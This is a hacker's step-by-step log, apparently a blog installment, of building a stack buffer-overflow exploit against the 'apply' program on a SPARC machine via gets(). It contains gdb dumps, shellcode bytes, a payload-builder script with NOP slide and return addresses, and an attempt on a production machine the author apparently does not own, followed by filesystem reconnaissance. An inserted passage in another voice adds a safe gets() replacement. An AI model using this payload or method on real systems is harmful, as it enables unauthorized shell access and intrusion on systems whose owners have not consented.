Hacking Apply – Pt. V
(gdb) 0x00012b2c in askyorn ()
(gdb)
$ unknown mode: cooked
$ stty cooked
$ exit
(gdb) i r
g0             0x0          0
g1             0x6e         110
g2             0x0          0
g3             0x0          0
g4             0x0          0
g5             0x0          0
g6             0x0          0
g7             0x0          0
o0             0xffbef930   -4261584
o1             0xffbefd81   -4260479
o2             0x2919e      168350
o3             0x1          1
o4             0xff33c008   -13385720
o5             0x0          0
sp             0xffbef8c0   0xffbef8c0
o7             0x12a68      76392
l0             0x291a0      168352
l1             0x28d91      167313
l2             0xff000000   -16777216
l3             0xff0000     16711680
l4             0xff00       65280
l5             0x81000000   -2130706432
l6             0x7efefeff   2130640639
l7             0x81010100   -2130640640
i0             0x0          0
i1             0x29190      168336
i2             0xff343a54   -13354412
i3             0x0          0
i4             0xff33c008   -13385720
i5             0x0          0
fp             0xffbefd40   0xffbefd40
i7             0x11630      71216
y              0x0          0
psr            0xfe401007   -29356025
wim            0x0          0
tbr            0x0          0
pc             0x12b2c      0x12b2c <askyorn+252>
npc            0x11638      0x11638 <Acct+376>
fsr            0x0          0
csr            0x0          0
(gdb) x/96x $sp
0xffbef8c0: 0x000291a0 0x00028d91 0xff000000 0x00ff0000
0xffbef8d0: 0x0000ff00 0x81000000 0x7efefeff 0x81010100
0xffbef8e0: 0x00000000 0x00029190 0xff343a54 0x00000000
0xffbef8f0: 0xff33c008 0x00000000 0xffbefd40 0x00011630
0xffbef900: 0x00000000 0xff342fb0 0x00013da8 0x00000000
0xffbef910: 0x000292d1 0x00000024 0x00013da4 0x80000000
0xffbef920: 0x00000000 0x0000006e 0x00000000 0x00000000
0xffbef930: 0x6e6e6e6e 0x6e6e6e6e 0x110bd89a 0x9012216e
0xffbef940: 0xd023a054 0x110bdcda 0xd023a058 0x110b5a40
0xffbef950: 0xd023a05c 0xc023a060 0x9003a054 0xd023a048
0xffbef960: 0x9003a05c 0xd023a04c 0xc023a050 0x9003a054
0xffbef970: 0x9203a048 0x941b400d 0x8210203b 0x91d02008
0xffbef980: 0x901b400d 0x82102001 0x91d02008 0x41414141
0xffbef990: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef9a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef9b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef9c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef9d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef9e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef9f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbefa00: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbefa10: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbefa20: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbefa30: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) si
0x00011638 in Acct ()
(gdb)
$
$
$ exit
(gdb) x/96x $sp
0xffbefd40: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbefd50: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbefd60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbefd70: 0x41414141 0x41414141 0xffbefe68 0xffbef930
0xffbefd80: 0x00000000 0x00013da8 0x00028d92 0x0002919e
0xffbefd90: 0x00000001 0xff33c008 0x00000000 0x00000000
0xffbefda0: 0x00000000 0x00000078 0x00000000 0xffbef9a9
0xffbefdb0: 0x00000001 0x00000001 0xff33f014 0xff320208
0xffbefdc0: 0xffbefdc8 0x0001135c 0xff33e5f0 0x00000000
0xffbefdd0: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbefde0: 0x00000000 0xff3de7a8 0x00000001 0xffbefebc
0xffbefdf0: 0xffbefec4 0x0002a6e4 0x00000000 0x00000000
0xffbefe00: 0xffbefe58 0x00010fec 0x00000000 0x00027ccc
0xffbefe10: 0xffbefe78 0x00000000 0x00000000 0x00000000
0xffbefe20: 0x00000000 0x00000000 0x00000003 0x00000000
0xffbefe30: 0x00000000 0x00000000 0x00000000 0xffffffff
0xffbefe40: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbefe50: 0xffbefe58 0x00010fac 0x00000001 0xffbefebc
0xffbefe60: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbefe70: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbefe80: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbefe90: 0x00000000 0x00000000 0x00000000 0x00000001
0xffbefea0: 0xffbefebc 0x00000000 0x00000000 0x00000000
0xffbefeb0: 0x00000000 0x00000000 0x00000001 0xffbeff50
(gdb) x/10i $pc
0x11638 <Acct+376>: mov %o0, %g1
0x1163c <Acct+380>: cmp %g1, 0
0x11640 <Acct+384>: be 0x114f4 <Acct+52>
0x11644 <Acct+388>: nop
0x11648 <Acct+392>: call 0x1320c <quit>
0x1164c <Acct+396>: nop
0x11650 <Acct+400>: b 0x114f4 <Acct+52>
0x11654 <Acct+404>: nop
0x11658 <Acct+408>: sethi %hi(0x28c00), %g1
0x1165c <Acct+412>: or %g1, 0x190, %g1 ! 0x28d90 <ibuf>
(gdb) i r
g0             0x0          0
g1             0x6e         110
g2             0x0          0
g3             0x0          0
g4             0x0          0
g5             0x0          0
g6             0x0          0
g7             0x0          0
o0             0x0          0
o1             0x29190      168336
o2             0xff343a54   -13354412
o3             0x0          0
o4             0xff33c008   -13385720
o5             0x0          0
sp             0xffbefd40   0xffbefd40
o7             0x11630      71216
l0             0x41414141   1094795585
l1             0x41414141   1094795585
l2             0x41414141   1094795585
l3             0x41414141   1094795585
l4             0x41414141   1094795585
l5             0x41414141   1094795585
l6             0x41414141   1094795585
l7             0x41414141   1094795585
i0             0x41414141   1094795585
i1             0x41414141   1094795585
i2             0x41414141   1094795585
i3             0x41414141   1094795585
i4             0x41414141   1094795585
i5             0x41414141   1094795585
fp             0xffbefe68   0xffbefe68
i7             0xffbef930   -4261584
y              0x0          0
psr            0xfe401003   -29356029
wim            0x0          0
tbr            0x0          0
pc             0x11638      0x11638 <Acct+376>
npc            0x1163c      0x1163c <Acct+380>
fsr            0x0          0
csr            0x0          0
(gdb)
crucial address: right after the gets() in Acct:
0x11518
The exploit wasn't working. The segfault was caused by something else: a register mess.
(gdb)
0x11778 <Acct+696>: srl %g1, 3, %g1
0x1177c <Acct+700>: and %g1, 1, %g1
0x11780 <Acct+704>: cmp %g1, 0
0x11784 <Acct+708>: bne 0x117c0 <Acct+768>
0x11788 <Acct+712>: nop
0x1178c <Acct+716>: add %fp, -28, %o2
0x11790 <Acct+720>: ld [ %o2 ], %o5
0x11794 <Acct+724>: add %fp, -24, %o4
0x11798 <Acct+728>: ld [ %o4 ], %g1
0x1179c <Acct+732>: ldub [ %g1 ], %o3
Luckily, the only register we need to restore to normal is %o3:
0x11794 <Acct+724>: add %fp, -24, %o4
0x11798 <Acct+728>: ld [ %o4 ], %g1
0x1179c <Acct+732>: ldub [ %g1 ], %o3
0x117a0 <Acct+736>: inc %g1
0x117a4 <Acct+740>: st %g1, [ %o4 ]
0x117a8 <Acct+744>: mov %o5, %g1
0x117ac <Acct+748>: stb %o3, [ %g1 ]
must put a good value into %fp-24
(gdb) print/x $fp-24
$1 = 0xffbefdb0
We just need a stack offset in there : )
It's a double-indirect pointer,
so we need to use two stack values,
and we need to figure out the offset in the buffer where the %fp-24 variable is…
I might not be able to work with this :(
Guaranteeing the double indirection is near impossible… so I am going to look elsewhere.
Already found a great place too: Groups()
Groups() comes after Acct()
Acct(&data);
Groups(&data);          /* offer choices from SETUP file */
...
Groups(datap)
struct info *datap;
{
    int index, count=0;

    DBUG(HELLO,"** Groups()\n",NULL);
    blurb(Groups_inst1);
    gets(ibuf);
    show_params();
    for (index = 0; index < NPSETS; index++)
        datap->groups[index] = FREE;
    for (;;) {
        printf(GROUPS_PROMPT1);
        printf(GROUPS_PROMPT2, npsets);
        /* gets discards newline and null-terminates string */
        if ( (gets(ibuf)) == (char *)NULL ) {
            *(ibuf) = 'x';      /* gets returns (char *)NULL on error or EOF */
            *(ibuf+1) = EOS;    /* We'll treat EOF as a 'quit'. */
        } else {
            if ( *ibuf == '\0' ) {      /* Empty line - no command */
                *(ibuf) = 'p';          /* By default we'll print the menu */
                *(ibuf+1) = EOS;
            }
        }
        switch (*ibuf) {
        case 'c':
            for (index = 0; index < NPSETS; index++)
                datap->groups[index] = FREE;
            count=0;
            break;
        case 't':
            show_info(datap);
            break;
        case 'p':
            show_params();
            break;
        case 'q':
            if (count > 0)
                return(SUCCESS);
            printf("You did not select any group or class.\n");
            /* FALL THROUGH */
        case 'x':   /* Give applicant a chance to abandon the application */
            if (askyorn("Do you want to just forget the whole thing")) {
                blurb(Groups_quit);
                quit();
                /* NOTREACHED */
            }
        ...
I can add a group..
hit ‘x’, buffer overflow, then ‘q’
set a break coming out of Groups()
disas Groups
...
0x0001233c <Groups+836>: ret
0x00012340 <Groups+840>: restore
THERE IS HOPE!!
(gdb) x/96x $sp
0xffbefc88: 0xff33fad9 0x00000000 0x00000006 0x00000000
0xffbefc98: 0x00000000 0x00000001 0x000291a0 0xff33c008
0xffbefca8: 0x00029190 0xff3439ec 0x00029190 0x000292d1
0xffbefcb8: 0x00000018 0x00015081 0xffbefce8 0xff3141fc
0xffbefcc8: 0xff343194 0x00000000 0xffbefd94 0x00000000
0xffbefcd8: 0x00000000 0x00000000 0x7efefeff 0x00000038
0xffbefce8: 0xff3439ec 0x00028d90 0xff000000 0x00ff0000
0xffbefcf8: 0x0000ff00 0x81000000 0x7efefeff 0x81010100
0xffbefd08: 0x00028d90 0x00029190 0x0002919e 0xff343a54
0xffbefd18: 0xff33c008 0x00000000 0xffbefd48 0x000120a4
0xffbefd28: 0x000291c0 0x00029720 0x00000001 0x00000006
0xffbefd38: 0xffbefd40 0x00011698 0xffbef9a8 0x00028d90
0xffbefd48: 0xffbef9a8 0x00028d90 0x00000000 0x00000000
0xffbefd58: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbefd68: 0x00027ccc 0x00028d91 0x0002919e 0x00000001
0xffbefd78: 0xff33c008 0x00000003 0xffbefdc8 0x00011424
0xffbefd88: 0x00000007 0x00027ccc 0x00000006 0xff343a54
0xffbefd98: 0x00000000 0x00027cd8 0x00027cc0 0x00000031
0xffbefda8: 0xfffffff5 0x000284d5 0x00000004 0x00000003
0xffbefdb8: 0xff33f014 0xff320208 0xffbefdc8 0x0001135c
0xffbefdc8: 0xff33e5f0 0x00000000 0x00000000 0x00000000
0xffbefdd8: 0x00000000 0x00000000 0x00000000 0xff3de7a8
0xffbefde8: 0x00000001 0xffbefebc 0xffbefec4 0x0002a6e4
0xffbefdf8: 0x00000000 0x00000000 0xffbefe58 0x00010fec
Look for the 0x00000004: that is our target, and we must write it with 0x01.
here is where our buffer began:
0xffbef938: 0x6e414141 0x41414141 0x41414141 0x41414141
0xffbef948: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef958: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef968: 0x41414141 0x41414141 0x41009
MONEY
right at the beginning of apply execution, there is a call to this function:
switch (action = Get_old_pw(&data)) {
in that function is a call to my favorite vulnerable function, askyorn()
Get_old_pw(datap)
struct info *datap;
{
    struct passwd *pw;
    int try;

    DBUG(HELLO,"** Get_old_pw()\n",NULL);
    if (askyorn("Do you already have an account with us")) {
        printf("Please enter your login name: ");
        gets(datap->login);
        /*
         * always setpwent() to rewind, since previous getpw*'s
         * leave the file pointer in an indeterminate state.
         */
        setpwent();
        if ( (pw=getpwnam(datap->login)) == NULL ) {
            printf("Account for %s not found in database.\n",datap->login);
            printf("Your account will have to be recreated.\n");
            if (askyorn("Do you want to re-use that login name")) {
                printf("OK. Re-using %s in this application.\n",datap->login);
                return(RECREATE);
            } else
                return(CREATE);
        } else {
            /* verify user's identity */
            for (try=0; try<NTRIES; try++, printf("\nNope. Try again.\n")) {
                if (EQUAL(pw->pw_passwd, crypt(getpass(PROMPT),pw->pw_passwd))) {
                    strncpy(datap->pass,pw->pw_passwd,SBUF);
                    strncpy(datap->name,pw->pw_gecos,SBUF);
                    return(MODIFY);
                }
            }
            printf("No match in %d tries.", try);
            printf(" Your password must be reset.\n");
            fatal("Please see the operator or System Administrator.");
        }
    } else
        return(CREATE);
}
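The defect in both Groups() and Get_old_pw() is the same one: gets() copies an unbounded line into ibuf and datap->login, which is where the 0x41414141 words in the stack dumps come from. As an added example that is not apply's own code, here is a bounded replacement that keeps Groups()'s conventions (EOF becomes 'x', an empty line becomes 'p'); the buffer size, the handling of an over-long line and the tmpfile()-based helper are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define EOS '\0'
enum line_status { LINE_EOF = -1, LINE_OK = 0, LINE_TRUNCATED = 1 };

/* Bounded stand-in for gets(): reads at most size-1 characters, always
 * NUL-terminates and strips the newline as gets() did. An over-long line is
 * drained up to its newline so the leftover bytes cannot reappear as the
 * next "command", and LINE_TRUNCATED is reported instead of an overflow. */
enum line_status read_line(char *buf, size_t size, FILE *fp)
{
    size_t len;
    int ch;

    if (size == 0 || fgets(buf, (int)size, fp) == NULL) {
        if (size) buf[0] = EOS;             /* error or EOF: leave a valid empty string */
        return LINE_EOF;
    }
    len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {  /* whole line fit: strip newline like gets() */
        buf[len - 1] = EOS;
        return LINE_OK;
    }
    if (len < size - 1 || (ch = getc(fp)) == '\n' || ch == EOF)
        return LINE_OK;                     /* line ended exactly at the limit, or input ended */
    while ((ch = getc(fp)) != EOF && ch != '\n')
        ;                                   /* discard the rest of the over-long line */
    return LINE_TRUNCATED;
}

/* Groups()'s command selection with gets(ibuf) replaced. EOF still maps to 'x'
 * (abandon) and an empty line to 'p' (print menu), as in the original. */
char groups_command(char *ibuf, size_t size, FILE *in)
{
    enum line_status st = read_line(ibuf, size, in);

    if (st == LINE_EOF) {
        ibuf[0] = 'x'; ibuf[1] = EOS;       /* EOF: treat as quit, as the original does */
    } else if (st == LINE_TRUNCATED || ibuf[0] == EOS) {
        ibuf[0] = 'p'; ibuf[1] = EOS;       /* empty (original) or over-long (our choice): menu */
    }
    return ibuf[0];
}

/* Helper (assumed, for exercising the code): runs groups_command() over a constructed input string. */
char groups_command_from_string(const char *input, char *ibuf, size_t size)
{
    FILE *fp = tmpfile();                   /* stands in for stdin */
    char cmd = '?';
    if (fp == NULL) return cmd;
    fputs(input, fp);
    rewind(fp);
    cmd = groups_command(ibuf, size, fp);
    fclose(fp);
    return cmd;
}
```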
This is EXACTLY the kind of behavior I want — fill the buffer and return, return without doing anything! <3 At this point, I have successfully exploited a locally run GDB version of the program. What's next is to produce a NOP sled with slicing capabilities. Step one: figure out the maximum size of the slide. Earlier I had this:
1092 + 'nnnn' = 1096
# asmshell5_interactive.bin is 84 bytes
perl -e 'print "nnnnnnnn";'
cat asmshell5_interactive.bin
# 92 bytes so far
# 1096 - 92 = 1004
perl -e 'print "A"x1004'
printf "\xff\xbe\xfe\x68"
printf "\xff\xbe\xf9\x30"
# code will start at 0xffbef938
# return address goes here
and turn it into this, ideally in C:
1004 / 4 = 251 NOPs
"nnnnnnnn" | 251 NOPs | shellcode | fp | retaddr
but I just prefer using bash for this.
bazz@life[pts/2][~/latest] cat build_apply_sc2
# asmshell5_interactive.bin is 84 bytes
perl -e 'print "nnnnnnnn";'
cat asmshell5_interactive.bin
# 92 bytes so far
# 1096 - 92 = 1004
perl -e 'print "\x01"x1004'
printf "\xff\xbe\xfe\x68"
printf "\xff\xbe\xf9\x30"
# code will start at 0xffbef938
# return address goes here
bazz@life[pts/2][~/latest] ./build_apply_sc2 > /tmp/B
bazz@life[pts/2][~/latest] od -t x1 -A d /tmp/B
0000000 6e 6e 6e 6e 6e 6e 6e 6e 11 0b d8 9a 90 12 21 6e
0000016 d0 23 a0 54 11 0b dc da d0 23 a0 58 11 0b 5a 40
0000032 d0 23 a0 5c c0 23 a0 60 90 03 a0 54 d0 23 a0 48
0000048 90 03 a0 5c d0 23 a0 4c c0 23 a0 50 90 03 a0 54
0000064 92 03 a0 48 94 1b 40 0d 82 10 20 3b 91 d0 20 08
0000080 90 1b 40 0d 82 10 20 01 91 d0 20 08 01 01 01 01
0000096 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
*
0001088 01 01 01 01 01 01 01 01 ff be fe 68 ff be f9 30
0001104
bazz@life[pts/2][~/latest] od2sc /tmp/B
Looking good. Let's get it into C. The only offsets I'll be changing are 1100, 1101, 1102 and 1103, for the return address. We need smart PTY "signal handling". I use CTRL-V to print a raw control character so I can grab its hex code:
bazz@life[pts/2][~/latest] printf "^S" | od -t x1
0000000 13
0000001
CTRL-S will adjust the return address based on a slicing algorithm I've yet to create, and CTRL-D, as always, sends the payload without a carriage return. A CR is inserted manually with CTRL-J.
I made sure I was doing things correctly:
#include <stdio.h>
#include <stdint.h>

int main(void)
{
    uint32_t calc_RA = 0x12345678;      /* calculated return address */
    unsigned char c;                    /* unsigned: a high byte such as 0xff must not sign-extend in printf */

    c = ( calc_RA >> 24 ) & 0xff;
    printf ("MSB = %02x\n", c);
    c = ( calc_RA >> 16 ) & 0xff;
    printf ("byte 3 = %02x\n", c);
    c = ( calc_RA >> 8 ) & 0xff;
    printf ("byte 2 = %02x\n", c);
    c = ( calc_RA ) & 0xff;
    printf ("LSB = %02x\n", c);
    return 0;
}
It's useful to know the return address of Get_old_pw: 0x00011a58
The NOP slide range is from 0xffbef940 to 0xffbefd2c.
I am now at the point where I can get a shell on my own remote demo system, and I can get the shell by invoking the application on a remote system at school, but not on the actual production machine… I wonder….
Could they be using ASLR??? is the stack at a different location?? My best guess is that it’s running in 64-bit mode, which is unlikely…
7FFFC000-7FFFFFFF is the stack space: 16KB, 16384 bytes.
The middle is 7FFFE000.
The shell code is the same for the 64-bit version…
Well, I just tried all of the 64-bit stack space; that didn't work… I did skip one offset, but to hell with it.
Since I have no idea what to do, I'm just like -.- What else can I find on blade60?? Hm, I dunno, let's try this:
grep -r -i "blade60" / 2>/dev/null > anything_blade60_related #
TO BE CONTINUED